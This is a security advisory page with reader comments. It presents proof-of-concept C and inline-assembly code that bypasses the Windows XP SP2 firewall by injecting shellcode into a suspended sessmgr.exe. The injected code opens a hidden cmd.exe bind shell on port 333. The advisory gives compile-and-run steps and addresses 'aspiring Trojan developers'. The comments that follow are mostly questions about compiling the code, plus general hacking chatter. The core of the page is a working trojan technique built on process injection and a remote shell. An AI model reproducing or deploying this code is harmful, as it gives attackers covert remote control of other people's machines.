|
|
|
|
| |
Windows XP Service Pack 2 incorporates many enhancements to try to better protect systems from malware and other forms of attacks. One of those layers of protection is the Windows XP SP2 Firewall. One of the features of this Firewall is the ability to allow users to decide what applications can listen on the network. By allowing users to control what applications can communicate on the network, Microsoft believes that systems will be protected against threats such as Trojans. Like so many things Microsoft says, this is inaccurate and in fact it is very easy for locally executing code to bypass the Windows Firewall. So don't worry you aspiring Trojan developers, your still going to be able to Trojan consumer and corporate systems to your hearts content.
Attached to this advisory is proof of concept code that demonstrates how a Trojan could bind to a port and accept connections by piggybacking on the inherent trust of sessmgr.exe. Simply compile this program and run it as any local user. To test if the Firewall has been bypassed (it is!) telnet from another machine to the target machine on port 333 and if your connected, then you've successfully bypassed the Windows XP Service Pack 2 Firewall. |
| |
Credit:
The information has been provided by americanidiot.
|
| |
Exploit:
#include <windows.h>
#include <winsock.h>
#include <stdlib.h>
#include <stdio.h>
#include <winsock.h>
void setfp(char *buffer,int sz,DWORD from,DWORD fp)
{
int i;
for(i=0;i<sz-5;i++)
if (buffer[i]=='\xb8'&&*(DWORD*)(buffer+i+1)==from)
{*(DWORD*)(buffer+i+1)=fp;break;}
}
int injcode(char *buffer)
{
HMODULE ws2_32;
DWORD _loadlibrarya,_createprocessa,_wsastartup,_wsasocketa,_bind,_listen,_accept,_sleep;
char *code;
int len;
ws2_32=LoadLibrary("ws2_32");
_loadlibrarya=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA");
_createprocessa=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"CreateProcessA");
_sleep=(DWORD)GetProcAddress(GetModuleHandle("kernel32"),"Sleep");
_wsastartup=(DWORD)GetProcAddress(ws2_32,"WSAStartup");
_wsasocketa=(DWORD)GetProcAddress(ws2_32,"WSASocketA");
_bind=(DWORD)GetProcAddress(ws2_32,"bind");
_listen=(DWORD)GetProcAddress(ws2_32,"listen");
_accept=(DWORD)GetProcAddress(ws2_32,"accept");
__asm
{
call over
push '23'
push '_2sw'
push esp
mov eax,0x11111111
call eax
xor ebx,ebx
push 0x64
pop ecx
wsadata:
push ebx
loop wsadata
push esp
push 0x101
mov eax,0x33333333
call eax
push ebx
push ebx
push ebx
push ebx
push SOCK_STREAM
push AF_INET
mov eax,0x44444444
call eax
mov esi,eax
push ebx
push ebx
push ebx
push 0x4D010002 /*port 333*/
mov eax,esp
push 0x10
push eax
push esi
mov eax,0x55555555
call eax
push SOMAXCONN
push esi
mov eax,0x66666666
call eax
push ebx
push ebx
push esi
mov eax,0x77777777
call eax
mov edi,eax
push ebx
push ebx
push ebx
push ebx
mov eax,esp
push edi
push edi
push edi
push ebx
push SW_HIDE
push STARTF_USESTDHANDLES
push 0xA
pop ecx
startupinfo:
push ebx
loop startupinfo
push 0x44
mov ecx,esp
push 'dmc'
mov edx, esp
push eax
push ecx
push ebx
push ebx
push ebx
push 1
push ebx
push ebx
push edx
push ebx
mov eax,0x22222222
call eax
push INFINITE
mov eax,0x88888888
call eax
over:
pop eax
mov code,eax
}
len=0xA0;
memcpy(buffer,code,len);
setfp(buffer,len,0x11111111,_loadlibrarya);
setfp(buffer,len,0x22222222,_createprocessa);
setfp(buffer,len,0x33333333,_wsastartup);
setfp(buffer,len,0x44444444,_wsasocketa);
setfp(buffer,len,0x55555555,_bind);
setfp(buffer,len,0x66666666,_listen);
setfp(buffer,len,0x77777777,_accept);
setfp(buffer,len,0x88888888,_sleep);
return len;
}
void main(void)
{
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
CONTEXT context;
LDT_ENTRY sel;
DWORD read,tib,peb,exebase,peoffs,ep;
IMAGE_NT_HEADERS pehdr;
int len;
char sessmgr[MAX_PATH+13];
char buffer[2048];
GetSystemDirectory(sessmgr,MAX_PATH);
sessmgr[MAX_PATH]=0;
strcat(sessmgr,"\\sessmgr.exe");
memset(&sinfo,0,sizeof(sinfo));
sinfo.cb=sizeof(sinfo);
if (!CreateProcess(sessmgr,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&sinfo,&pinfo))
printf("createprocess failed"), exit(1);
context.ContextFlags=CONTEXT_FULL;
GetThreadContext(pinfo.hThread,&context);
GetThreadSelectorEntry(pinfo.hThread,context.SegFs,&sel);
tib=sel.BaseLow|(sel.HighWord.Bytes.BaseMid<<16)|(sel.HighWord.Bytes.BaseHi<<24);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(tib+0x30),&peb,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(peb+0x08),&exebase,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+0x3C),&peoffs,4,&read);
ReadProcessMemory(pinfo.hProcess,(LPCVOID)(exebase+peoffs),&pehdr,sizeof(pehdr),&read);
ep=exebase+pehdr.OptionalHeader.AddressOfEntryPoint;
len=injcode(buffer);
VirtualProtect((LPVOID)ep,len,PAGE_EXECUTE_READWRITE,&read);
WriteProcessMemory(pinfo.hProcess,(LPVOID)ep,buffer,len,&read);
ResumeThread(pinfo.hThread);
}
|
| Subject:
|
Compilation of code |
Date: |
25 Jan. 2006 |
| From: |
Ping |
| Is this in C++? Or what language is it? |
|
| Subject:
|
Compilation of code |
Date: |
4 Feb. 2006 |
| From: |
Dr460nfly |
| obviously... LMAO |
|
| Subject:
|
Compilation of code |
Date: |
6 Feb. 2006 |
| From: |
Thot |
| how do i compile this code??? i can't compile the asm source... |
|
| Subject:
|
no.. |
Date: |
7 Apr. 2006 |
| From: |
M3ocs-D4rksun |
It's only C..
It isn't a C++ code..
[]'s darksun |
|
| Subject:
|
both wrong |
Date: |
14 May 2006 |
| From: |
al |
| its actually a combination of C and IA-32 assembly code...you should be able to tweak some settings in visual studio and get this to compile...i'll try it and let you know |
|
| Subject:
|
al is correct |
Date: |
16 May 2006 |
| From: |
me |
| al is correct, if you look close you can see the assembly code, and the header files that are declared are *.h, typically meaning C. |
|
| Subject:
|
How to study the code |
Date: |
11 Aug. 2006 |
| From: |
wanderleyBR |
Did you use a bug on software? or you mapped windows XP firewall with prograns and created a crack???
Excuse-me my ignorance and my poor english.
|
|
| Subject:
|
also known as inline assembly ;) |
Date: |
30 Sep. 2006 |
| From: |
none |
its also known as inline assembly, another powerful feature of the c, and c++ language, an example of a function containing inline asm is as below
void dumbshit()
{
__asm__("e;xor %eax, %eax"e;);
}
int main(int argc, char **argv)
{
dumbshit();
}
the above would simply just zero out the accumulator register
also the above should compile smoothly with gcc as im not to familiar with intel syntax only at&t i think the only difference's are the register symbols such as % are different on this compile and also if you were using other register names there backwards(depending on how you view it hehehe :) such as __asm__("e;mov %eax, %esp); would be __asm__("e;mov esp, eax"e;);, although i could be wrong, i stick to gcc for inline ;) |
|
| Subject:
|
also known as inline assembly ;) |
Date: |
30 Sep. 2006 |
| From: |
none |
its also known as inline assembly, another powerful feature of the c, and c++ language, an example of a function containing inline asm is as below
void dumbshit()
{
__asm__("e;xor %eax, %eax"e;);
}
int main(int argc, char **argv)
{
dumbshit();
}
the above would simply just zero out the accumulator register
also the above should compile smoothly with gcc as im not to familiar with intel syntax only at&t i think the only difference's are the register symbols such as % are different on this compile and also if you were using other register names there backwards(depending on how you view it hehehe :) such as __asm__("e;mov %eax, %esp); would be __asm__("e;mov esp, eax"e;);, although i could be wrong, i stick to gcc for inline ;)
|
|
| Subject:
|
this |
Date: |
13 Oct. 2006 |
| From: |
adadad |
| I want to hack but i'm only 13!!!! |
|
| Subject:
|
Looks Nice :) |
Date: |
18 Jan. 2007 |
| From: |
Cr45h_0v3r1de |
My assembly skills arn't so good, so half of the code is a bit foreign to me.
Would i be right in saying most efficient trojans require asm? or is that not necessarily true?
And "e;adadad"e;, learn how to code (C is a nice place to start), get to grips with some networking concepts and typologys, then learn some exploitation techniques (web included!)... young is the best place to start. (And rememebr, friends come before computers).. Good luck .. if your reading this :/
|
|
| Subject:
|
interesting |
Date: |
9 Feb. 2007 |
| From: |
Nanolith_PL |
| Any documentation? Or is this pure hacking code? ;] (short and effective) |
|
| Subject:
|
How it Works, Noobs... |
Date: |
18 Jul. 2007 |
| From: |
Fishbones |
Guys, it looks like none of you know what this does.
The program above allows you to exploit the trust of "e;sessmgr.exe"e; and bind the trojan to the port that it uses (or bind it to sessmgr.exe) to execute the trojan when sessmgr.exe is ran (which is usually all of the time). It allows you to piggyback as the author has said. And to all you kids who say "e;I want to hack"e;, don't waste your time. You will probably end up a skiddie like most of them... A hacker is not a career, it is a lame ass label. |
|
| Subject:
|
Is this code can be converted into .NET |
Date: |
10 Oct. 2007 |
| From: |
Shees |
| I am C# .net programmer, asm is somehow not fully understandable for me. Can anyone guide me, how to convert this code in C#? |
|
| Subject:
|
LOL |
Date: |
26 Oct. 2007 |
| From: |
COOLDUDE |
@Shees
Dude I have one advice for you. If You are C# Develper You should be able to learn C in a couple days. There is great book about C, "e;C Primer Plus"e; written by Stephen Prata. Remeber, You are guru if you know C :). |
|
| Subject:
|
lol |
Date: |
18 Dec. 2007 |
| From: |
H3x Cster |
omg, omfg! lol i have to agree with fishbones.
i have written a few apps and scripts myself in c, and asm, and if you guys can't understand a few lines of code then what's the point in asking unrelated questions, or questions out of context?
i learnt to write some cool apps in vb6 initially and then moved on from there, and then i landed myself a copy of metasploit....which is a lazy way to hack really...but you still need to know how to write code if you want to publish your own or update existing exploits in/for the framework (i prefer v2.7 or a commandline version of 3.0-3.1)
it upsets me to see people who can't be bothered to do some research for themselves, by themselves! i also agree with what cooldude has said...give yourselves a couple of days with the right info and learn it.
anyways i'm done, catch you never! |
|
| Subject:
|
foo |
Date: |
8 Jul. 2008 |
| From: |
some guy |
inline asm is NOT a feature of C++ and this is not C as you can see from the parameter lists
also, converting this to c# is basically not possible without some real chores. its not a low-level ("e;true"e;) programming language. the just in time compiler turns the msil into asm... (bytecode for cpu, but its basically the same) |
|
| Subject:
|
Inline assembly with C and calls to win32 API |
Date: |
4 Sep. 2008 |
| From: |
Kevins |
| Really good. !! .code .. ;) .. It is all in Assembly ( Inline ) with C .. with call to win32 API .. Or basically a program written in C with lot of asm codes and call to win32 api |
|
|
|
|
|
|
